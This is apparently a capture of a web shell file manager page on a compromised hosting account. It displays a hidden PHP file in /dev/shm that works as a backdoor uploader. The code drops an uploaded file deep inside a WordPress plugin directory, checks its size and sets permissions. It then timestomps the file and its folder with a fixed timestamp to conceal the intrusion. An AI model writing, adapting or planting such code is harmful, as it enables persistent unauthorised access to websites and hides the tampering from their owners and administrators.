HEX
Server: LiteSpeed
System: Linux premium193.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: unerbbkm (1029)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //dev/shm/.item
<?php   $p = "/home/siddwehd/public_html//home/siddwehd/.cpanel/ea-php-cli/nazirtraders.com/wp-content/plugins/LayerSlider/assets/static/codemirror/addon/mode/com_mtree"; $ft = 1746734282; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 36606) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 36606";         }         @unlink($p);     } } die('_upload_failed_');